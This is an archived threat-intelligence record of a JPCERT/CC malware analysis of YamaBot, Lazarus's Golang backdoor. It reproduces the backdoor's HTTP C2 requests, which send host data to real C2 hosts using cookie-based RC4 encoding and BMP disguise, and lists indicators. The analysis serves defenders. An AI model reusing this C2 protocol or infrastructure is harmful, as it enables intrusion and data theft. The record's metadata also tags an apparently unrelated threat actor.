{
	"id": "a86be2ae-6638-4755-ae15-a9bd13458491",
	"created_at": "2026-04-06T00:06:52.813537Z",
	"updated_at": "2026-04-10T03:30:11.964129Z",
	"deleted_at": null,
	"sha1_hash": "9fed14d392e7fa043af1885a188a8f98aa7d2ba1",
	"title": "YamaBot Malware Used by Lazarus - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 614971,
	"plain_text": "YamaBot Malware Used by Lazarus - JPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2022-07-06 · Archived: 2026-04-05 18:34:54 UTC\r\nLazarus\r\nJPCERT/CC is continuously investigating the activities of Lazarus. In 2021, JPCERT/CC presented on its attack activities at CODE BLUE and HITCON.\r\nhttps://github.com/JPCERTCC/Lazarus-research/\r\nThe YamaBot malware shared in the above research report targeted Linux OS, but another type recently found targets Windows OS. (It is referred to as Kaos in the document, but this blog refers to it as YamaBot.) YamaBot is malware coded in Golang, with slightly different functionality between the types created for each platform. In addition to YamaBot, Lazarus also created several other types of malware targeting multiple platforms, such as VSingle. This article covers the details of YamaBot.\r\nOverview of YamaBot\r\nYamaBot malware communicates with C2 servers using HTTP requests. The following is a list of function names included in the sample that targets Windows OS. The name YamaBot was given by the attacker. The samples targeting Windows OS have OS-specific functions, such as creating and checking a mutex.\r\n_/D_/Bot/YamaBot/utilities.BaseDecodeR\r\n_/D_/Bot/YamaBot/utilities.HttpPostWithCookie\r\n_/D_/Bot/YamaBot/utilities.HttpPostWithFile\r\n_/D_/Bot/YamaBot/utilities.GetMacAddress\r\n_/D_/Bot/YamaBot/utilities.GetHash\r\n_/D_/Bot/YamaBot/utilities.GetCookieParams\r\n_/D_/Bot/YamaBot/utilities.GetRndString\r\n_/D_/Bot/YamaBot/utilities.BmpMaker\r\n_/D_/Bot/YamaBot/utilities.createMutex\r\n_/D_/Bot/YamaBot/utilities.CCheckkmutex\r\n_/D_/Bot/YamaBot/utilities.CIpaddress\r\n_/D_/Bot/YamaBot/utilities.COsname\r\n_/D_/Bot/YamaBot/utilities.getOSVer\r\n_/D_/Bot/YamaBot/utilities.Run\r\n_/D_/Bot/YamaBot/utilities.Run.func1\r\n_/D_/Bot/YamaBot/utilities.Run.func2\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).Lunch\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).Init_Verbindung\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).Verschlusselte_Zeichenkette_Eerhalten\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).getInitBotInfo\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nPage 1 of 9\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).getEggPrice\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).handleMarketPrice\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).processMarketPrice\r\n_/D_/Bot/YamaBot/engine.(*FileStruct).getSessionStr\r\nThe following is a list of malware function names included in the sample targeting Linux OS. The name kaos was used for it.\r\n_/C_/Users/administrator/Downloads/kaos/utilities.BaseDecodeR\r\n_/C_/Users/administrator/Downloads/kaos/utilities.HttpPostWithCookie\r\n_/C_/Users/administrator/Downloads/kaos/utilities.BaseDecode\r\n_/C_/Users/administrator/Downloads/kaos/utilities.HttpPostWithFile\r\n_/C_/Users/administrator/Downloads/kaos/utilities.GenerateUniqueID\r\n_/C_/Users/administrator/Downloads/kaos/utilities.GetCookieParams\r\n_/C_/Users/administrator/Downloads/kaos/utilities.BaseEncode\r\n_/C_/Users/administrator/Downloads/kaos/utilities.GetRndString\r\n_/C_/Users/administrator/Downloads/kaos/utilities.EierKochen\r\n_/C_/Users/administrator/Downloads/kaos/utilities.CIpaddress\r\n_/C_/Users/administrator/Downloads/kaos/utilities.Run\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).Lunch\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).kandidatKaufhaus\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).initDuck\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).GetEncString\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).getInitEggPrice\r\n_/C_/Users/administrator/Downloads/kaos/utilities.COsname\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).getEggPrice\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).handleMarketPrice\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).processMarketPrice\r\n_/C_/Users/administrator/Downloads/kaos/engine.(*Egg).getSessionStr\r\n_/C_/Users/administrator/Downloads/kaos/engine.NewEgg\r\nFigure 1 shows a part of the code that reads the configuration. The malware's configuration includes RC4 keys (see Appendix A for further information on the configuration). The configuration does not differ between the OS versions.\r\nFigure 1: Code for reading configuration\r\nThe following sections describe YamaBot's communication methods and commands, focusing on the differences between the Linux OS version and the Windows OS version.\r\nCommunication methods\r\nYamaBot communicates with the C2 server using HTTP requests. The following is the first HTTP POST request sent by YamaBot. Although it is an HTTP POST request, there is no data to send. It is also unique in that the User-Agent is Base64-encoded.\r\nPOST /editor/session/aaa000/support.php HTTP/1.1\r\nHost: 213.180.180.154\r\nUser-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNT\r\nConnection: close\r\nContent-Length: 0\r\nAccept-Encoding: gzip\r\nAfter successfully connecting to the C2 server, YamaBot sends the following request, which includes information in its Cookie header. The captcha_session contains a randomly generated string and an RC4 key ([random characters (16 bytes)][RC4 key (16 bytes)][random characters (4 bytes)]), Base64-encoded. The RC4 key is the first 16 bytes of the MD5 value created from the following data.\r\nTarget Windows OS: hostname, username, MAC address\r\nTarget Linux OS: hostname, username\r\nThe captcha_val contains device information and the results of command execution, RC4-encrypted and Base64-encoded.\r\nPOST /editor/session/aaa000/support.php HTTP/1.1\r\nHost: 213.180.180.154\r\nUser-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNT\r\nConnection: close\r\nContent-Length: 0\r\nCookie: captcha_session=MTE5NzZmMTYwYzRlNTU4YjhhNDZhMTM4ZGMwNzgzNTNhNmUy; captcha_val=W%2BIePQNeokIn\r\nAccept-Encoding: gzip\r\nThe first data sent in captcha_val is the OS information and IP address. The following contents are sent.\r\nwindows 6 amd64|[192.168.1.1]\r\nlinux 386|[192.168.1.1]\r\nFurthermore, if the size of the data to be sent exceeds a certain threshold (3,333 bytes and 7,000 bytes were observed in the samples), it is sent disguised as multipart BMP data instead of in captcha_val.\r\nPOST /recaptcha.php HTTP/1.1\r\nHost: www.karin-store.com\r\nUser-Agent: TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNT\r\nConnection: close\r\nContent-Length: [Length]\r\nContent-Type: multipart/form-data; boundary=f24fad327291ab32166b7aa751d1d945a35933ee5bd81618274cda6af\r\nCookie: captcha_session=YTY5NDQ5MDYwNmRkNjIyOWI3MzU1NTNmYzMxMzhiNTAyNGJh; captcha_val=NGI5NjdhNTdhNjl\r\nAccept-Encoding: gzip\r\n--f24fad327291ab32166b7aa751d1d945a35933ee5bd81618274cda6afeeb\r\nContent-Disposition: form-data; name=\"recaptcha\"; filename=\"recaptcha.png\"\r\nContent-Type: application/octet-stream\r\nBMf6(....0a..DT043b01c728892b495b99ea4c257fe3a8fea3a5f\r\n--f24fad327291ab32166b7aa751d1d945a35933ee5bd81618274cda6afeeb--\r\nThe commands from the server are included in the Set-Cookie header. They are RC4-encrypted and Base64-encoded and then included in captcha_session as follows. Note that the data sent by the malware is used as the RC4 key.\r\nSet-Cookie: captcha_session=[Base64-encoded command]\r\nCommand\r\nThe malware executes certain commands sent from its C2 server, and they differ considerably depending on the target OS. Those targeting Linux OS can only execute shell commands via /bin/sh. On the other hand, those targeting Windows OS have multiple commands implemented as follows.\r\ndir: Get the file list\r\nMapfs: Get the directory list\r\nDownload: Download file\r\nInfo: Send file path and PID\r\nSleep: Change sleep time\r\nUninstall: Delete itself\r\ni: Change interval time\r\nOthers: Execute a given string as a shell command\r\nThe command is in the form [command][command parameters], and the first half contains one of the above commands. When the command i is executed, the execution result is sent including German-language text as follows. The reason why German is included in YamaBot is unknown.\r\nFigure 2: Data sent when executing i command\r\nIn closing\r\nYamaBot malware is still used by attackers. Since it targets not only Windows OS but also Linux OS, servers should also be carefully investigated during incident investigation. Attention should continue to be paid, as attacks by Lazarus have been confirmed in Japan. Another type of malware used by Lazarus will be covered in the next issue.\r\nShusei Tomonaga\r\n(Translated by Takumi Nakano)\r\nAppendix A: Configuration Information\r\nTable A-2: List of configuration information (x86)\r\nOffset | Description | Notes\r\n0x000 | interval | communication interval\r\n0x004 | - | unused\r\n0x008 | C2 server | \r\n0x00C | C2 server length | \r\n0x010 | RC4 key | \r\n0x014 | RC4 key length | \r\n0x018 | C2 server connection | C2 server connection successful/unsuccessful\r\n0x01C | Cookie header value | Value to set in Cookie header\r\n0x020 | - | unused\r\n0x024 | The number of connections | The number of reconnections to C2 server\r\nTable A-1: List of configuration information (x64)\r\nOffset | Description | Notes\r\n0x000 | interval | communication interval\r\n0x008 | C2 server | \r\n0x010 | C2 server length | \r\n0x018 | RC4 key | \r\n0x020 | RC4 key length | \r\n0x028 | C2 server connection | C2 server connection successful/unsuccessful\r\n0x030 | Cookie header value | Value to set in Cookie header\r\n0x038 | - | unused\r\n0x040 | The number of connections | The number of reconnections to C2 server\r\nAppendix B: C2 server\r\nhttp://www.karin-store.com/recaptcha.php\r\nhttp://yoshinorihirano.net/wp-includes/feed-xml.php\r\nhttp://213.180.180.154/editor/session/aaa000/support.php\r\nAppendix C: Malware hash value\r\nf226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb\r\n6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially involved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security monitoring and analysis operations at a foreign-affiliated IT vendor. He has presented at CODE BLUE, BsidesLV, BlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nSource: https://blogs.jpcert.or.jp/en/2022/07/yamabot.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2022/07/yamabot.html"
	],
	"report_names": [
		"yamabot.html"
	],
	"threat_actors": [
		{
			"id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805",
			"created_at": "2023-07-20T02:00:08.724751Z",
			"updated_at": "2026-04-10T02:00:03.341845Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "MISPGALAXY:APT-C-60",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854",
			"created_at": "2024-12-28T02:01:54.668462Z",
			"updated_at": "2026-04-10T02:00:04.564201Z",
			"deleted_at": null,
			"main_name": "APT-C-60",
			"aliases": [
				"APT-Q-12"
			],
			"source_name": "ETDA:APT-C-60",
			"tools": [
				"SpyGlace"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434012,
	"ts_updated_at": 1775791811,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9fed14d392e7fa043af1885a188a8f98aa7d2ba1.pdf",
		"text": "https://archive.orkl.eu/9fed14d392e7fa043af1885a188a8f98aa7d2ba1.txt",
		"img": "https://archive.orkl.eu/9fed14d392e7fa043af1885a188a8f98aa7d2ba1.jpg"
	}
}